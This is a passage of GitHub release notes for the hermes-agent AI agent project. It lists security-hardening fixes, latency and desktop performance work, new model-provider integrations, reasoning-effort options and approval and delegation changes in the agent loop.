data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Security hardening round</strong> — This window closed a long list of credential-surface gaps: Vertex credentials scoped away from subprocess env and through profile secret scopes, media/vision/image-gen local-file reads routed through one shared credential-read guard, a webhook body-size-cap sweep across every aiohttp server, bot-token redaction in Telegram transport errors, Fireworks token prefixes added to the redactor, six P1 browser/MEDIA/.env hardening PRs salvaged in one pass, and CI hardened against untrusted-ref interpolation. (<a href="https://github.com/NousResearch/hermes-agent/pull/57660" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57660/hovercard">#57660</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58709" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58709/hovercard">#58709</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59215" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59215/hovercard">#59215</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56582/hovercard">#56582</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57842" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57842/hovercard">#57842</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/srojk34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/srojk34">@srojk34</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>)</p>
</li>
</ul>
<hr>
<h2>⚡ Performance — the speed spine</h2>
<h3>First-turn latency (all platforms)</h3>
<ul>
<li><strong>~80% TTFT cut</strong> — Discord capability detection off the critical path (token-keyed 24h disk cache + background refresh), Ollama probe skipped for known non-Ollama providers, agent-init blocking work removed; cold submit→dispatch ~4.3s → ~0.9s (<a href="https://github.com/NousResearch/hermes-agent/pull/59332" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59332/hovercard">#59332</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Perceived-latency round 2</strong> — <code>display.show_reasoning</code> default ON (watch the model think instead of a spinner), per-token response-box painting with width-aware force-flush, prompt-build caching, mtime-cached timezone resolution (<a href="https://github.com/NousResearch/hermes-agent/pull/59389" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59389/hovercard">#59389</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Segment mixed tool batches to recover lost concurrency; drop per-call base64 re-serialization from request-size estimates (<a href="https://github.com/NousResearch/hermes-agent/pull/64460" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64460/hovercard">#64460</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67788" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67788/hovercard">#67788</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Desktop speed wave</h3>
<ul>
<li>14× less splitter CPU via incremental block lexing for streaming markdown; virtualized review-pane diffs (no more full-Shiki freeze); snappy session switching on large transcripts; killed the layout-thrash cascade on session switch (<a href="https://github.com/NousResearch/hermes-agent/pull/67154" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67154/hovercard">#67154</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67818" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67818/hovercard">#67818</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65898" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65898/hovercard">#65898</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66033/hovercard">#66033</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Cut startup serialization + per-turn REST amplification; pre-warm profile backends and gateway sockets on hover intent; idle-mount boot-hidden panes; fast model picker + dialogs (<a href="https://github.com/NousResearch/hermes-agent/pull/66747" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66747/hovercard">#66747</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66347" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66347/hovercard">#66347</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67857" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67857/hovercard">#67857</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66470" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66470/hovercard">#66470</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Stop per-token sidebar + tool-row re-renders during streaming; stop eager JSON.stringify of every tool's args/result; scope tool-diff subscriptions; batch sidebar session slices into one profile-DB pass; targeted file-tree revalidation; rAF-coalesced sash resizes (<a href="https://github.com/NousResearch/hermes-agent/pull/67742" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67742/hovercard">#67742</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67842" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67842/hovercard">#67842</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67195" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67195/hovercard">#67195</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67245" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67245/hovercard">#67245</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67824" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67824/hovercard">#67824</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67838" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67838/hovercard">#67838</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67844" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67844/hovercard">#67844</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Systematized perf benchmark harness with trustworthy cold-start + first-token measurement, replacing 12 one-off scripts (<a href="https://github.com/NousResearch/hermes-agent/pull/67466" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67466/hovercard">#67466</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67697" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67697/hovercard">#67697</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Everywhere else</h3>
<ul>
<li>TUI renders streamed markdown incrementally per block (<a href="https://github.com/NousResearch/hermes-agent/pull/67236" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67236/hovercard">#67236</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li>Skill discovery cached by scan signature; snapshot manifest builds ~5× faster; text prefilter before AST parse in tool discovery (<a href="https://github.com/NousResearch/hermes-agent/pull/61414" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61414/hovercard">#61414</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61131" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61131/hovercard">#61131</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63941" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63941/hovercard">#63941</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>)</li>
<li>Copy-on-write message prep instead of full deepcopy; model-metadata probe-cache cluster; gateway <code>session.resume</code> model + display history from one SELECT (<a href="https://github.com/NousResearch/hermes-agent/pull/61133" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61133/hovercard">#61133</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61368" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61368/hovercard">#61368</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67247" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67247/hovercard">#67247</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
<li><code>hermes update</code> skips npm install when Node manifests are unchanged; dashboard session-list payloads trimmed + messages paginated (<a href="https://github.com/NousResearch/hermes-agent/pull/61580" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61580/hovercard">#61580</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60883" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60883/hovercard">#60883</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Byte-stable gateway system prompts — pinned session-context render keeps the prompt cache alive across turns (<a href="https://github.com/NousResearch/hermes-agent/pull/67403" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67403/hovercard">#67403</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>Providers &amp; models</h3>
<ul>
<li><strong>Fireworks AI provider</strong> with cost estimation + cached picker price columns, promoted to <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3370551446" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/2" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/2/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/2">#2</a> in provider pickers (<a href="https://github.com/NousResearch/hermes-agent/pull/62593" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62593/hovercard">#62593</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65476" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65476/hovercard">#65476</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65214" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65214/hovercard">#65214</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>DeepInfra</strong> hardened integration; <strong>Upstage Solar</strong> provider (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614488518" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/42231" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42231/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/42231">#42231</a> salvage) (<a href="https://github.com/NousResearch/hermes-agent/pull/63969" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63969/hovercard">#63969</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64541" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64541/hovercard">#64541</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li><strong>GPT-5.6 (Sol/Terra/Luna + Pro) end-to-end</strong> — context lengths, native/Codex catalogs, pricing, compaction caps across every route (<a href="https://github.com/NousResearch/hermes-agent/pull/61616" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61616/hovercard">#61616</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, building on <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>)</li>
<li>grok-4.5 (GA) catalog + reasoning allowlist; kimi-k3 on Nous Portal + OpenRouter (kimi-k2.x retired) + K3 discovery on the Kimi Coding endpoint; claude-fable-5 / claude-sonnet-5 / fugu-ultra curated; GA tencent/hy3 (<a href="https://github.com/NousResearch/hermes-agent/pull/60887" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60887/hovercard">#60887</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65913" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65913/hovercard">#65913</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65922" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65922/hovercard">#65922</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56617" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56617/hovercard">#56617</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60943" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60943/hovercard">#60943</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Catalog-labeled silent default (GLM-5.2) + bare-provider <code>/model</code> cost-safe routing; LM Studio JIT load mode; adaptive thinking for Kimi-family Anthropic endpoints (<a href="https://github.com/NousResearch/hermes-agent/pull/64771" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64771/hovercard">#64771</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65472" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65472/hovercard">#65472</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67606" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67606/hovercard">#67606</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>GLM-5.2 native reasoning_effort controls; Gemini request-context improvements; extra HTTP headers for LLM API calls; per-client model routing on the API server (<a href="https://github.com/NousResearch/hermes-agent/pull/58884" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58884/hovercard">#58884</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61873" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61873/hovercard">#61873</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishal-dharm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishal-dharm">@vishal-dharm</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57038" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57038/hovercard">#57038</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57028" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57028/hovercard">#57028</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Claude Sonnet 5 fully wired</strong> — curated lists, intro pricing, and metadata across every route (<a href="https://github.com/NousResearch/hermes-agent/pull/67932" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67932/hovercard">#67932</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Hide providers you don't use</strong> — <code>enabled: false</code> per-provider flag + <code>excluded_providers</code> config scrub unwanted providers from <code>/model</code> pickers and built-in resolution (<a href="https://github.com/NousResearch/hermes-agent/pull/67971" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67971/hovercard">#67971</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Bedrock catalog wave: real context-window probing from the live endpoint, 1M-context rows for current-gen Claude + Fable, geo-prefix parity, versioned profile-ID pricing, Opus 4.8/4.7 rows (<a href="https://github.com/NousResearch/hermes-agent/pull/68007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68007/hovercard">#68007</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67977" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67977/hovercard">#67977</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/68005" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68005/hovercard">#68005</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67976" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67976/hovercard">#67976</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>kimi-k3 rollout completed across Kimi-direct catalog surfaces with 1M context on canonical Kimi Coding endpoints (<a href="https://github.com/NousResearch/hermes-agent/pull/68108" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/68108/hovercard">#68108</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Provider pickers: Qwen providers folded into one group row; collapsible provider groups in the desktop model picker; friendlier TUI model display grouping same-endpoint providers (<a href="https://github.com/NousResearch/hermes-agent/pull/67758" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67758/hovercard">#67758</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67904" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67904/hovercard">#67904</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67908" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67908/hovercard">#67908</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Reasoning &amp; MoA</h3>
<ul>
<li><code>max</code> + <code>ultra</code> effort levels across every surface and route (<a href="https://github.com/NousResearch/hermes-agent/pull/62650" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62650/hovercard">#62650</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Per-model reasoning_effort overrides via a unified resolution chokepoint; per-task auxiliary effort; per-slot MoA preset effort; session-scoped <code>/reasoning</code> in the CLI (<a href="https://github.com/NousResearch/hermes-agent/pull/64458" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64458/hovercard">#64458</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64597" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64597/hovercard">#64597</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64631/hovercard">#64631</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67946" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67946/hovercard">#67946</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>MoA: <code>reference_max_tokens</code> to cap advisor output and cut latency; per-preset fanout cadence (<code>user_turn</code> runs advisors once per user turn); stale presets surfaced without retries; half-filled preset saves rejected at the API boundary; aggregator resolves reasoning like an acting model (<a href="https://github.com/NousResearch/hermes-agent/pull/56756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56756/hovercard">#56756</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57591" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57591/hovercard">#57591</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64756/hovercard">#64756</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Delegation, approvals &amp; the agent loop</h3>
<ul>
<li>Live subagent transcripts + durable background completions (see Highlights) (<a href="https://github.com/NousResearch/hermes-agent/pull/67479" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67479/hovercard">#67479</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63494" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63494/hovercard">#63494</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Smart approvals default; user-defined deny rules (block even under yolo); <code>/deny &lt;reason&gt;</code> relays the denial reason; plugin <code>pre_tool_call</code> approve action escalates to a human gate (re-landed with rule keys) (<a href="https://github.com/NousResearch/hermes-agent/pull/62661" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62661/hovercard">#62661</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59164" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59164/hovercard">#59164</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54518" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54518/hovercard">#54518</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60504" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60504/hovercard">#60504</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Unified delegation concurrency caps (<code>max_async_children</code> deprecated); explain long provider waits on the live status line; deterministic tool-output risk exposure (<a href="https://github.com/NousResearch/hermes-agent/pull/56955" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56955/hovercard">#56955</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64775" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64775/hovercard">#64775</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61793" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61793/hovercard">#61793</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Codex: live TUI/desktop tool cards for the app-server runtime, commentary streamed as visible interim messages, compaction routed through <code>thread/compact/start</code>, max-output truncation recovery, oversized message ids dropped on replay, banked usage-limit resets via <code>/usage reset</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/66514" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66514/hovercard">#66514</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66115" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66115/hovercard">#66115</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60114" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60114/hovercard">#60114</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58155" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58155/hovercard">#58155</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/62225" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62225/hovercard">#62225</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoaoMarcos44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoaoMarcos44">@JoaoMarcos44</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64280" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64280/hovercard">#64280</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
